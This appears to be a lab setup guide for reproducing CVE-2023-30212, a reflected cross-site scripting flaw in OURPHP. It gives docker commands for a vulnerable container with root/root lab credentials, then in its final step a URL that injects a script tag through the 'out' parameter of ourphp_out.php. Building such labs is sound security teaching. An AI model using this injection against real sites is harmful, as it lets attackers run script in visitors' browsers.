Share
## https://sploitus.com/exploit?id=A7634AF1-97BC-5FDE-AB55-C342F7AA7545
# CVE-2023-30212 LAB SETUP

<b>Prerequisite</b><br>
  Download docker.io <br>
 `sudo apt install -y docker.io`

<br>
<u>STEPS</u>

1. Download all files from my repository using the below command.<br>
   `git clone https://github.com/AAsh035/CVE-2023-30212.git`<br>
2. Now to make a docker image run the following command:<br>
   `sudo docker build -t vuln .`<br>
3. Next is to change the docker image to a conatainer.The container need to run at port 80 The command is :<br>
   `sudo docker run -d -p 80:80 vuln`
4. To check if the container is up use the command:<br>
   `sudo docker ps`
5. Type 127.0.0.1 in the browser and an OURPHP page will be loaded.
6. You need to configure the ourphp with the following:<br>
   Username : root<br>
   Password : root<br>
   Database Name: vuln

7. Now you need to configure username and password for Administrative. Set the following:<br>
   Username: root<br>
   Password: root

8. Now copy the below link and paste it in the browser:<br>
   `http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>`


   


https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0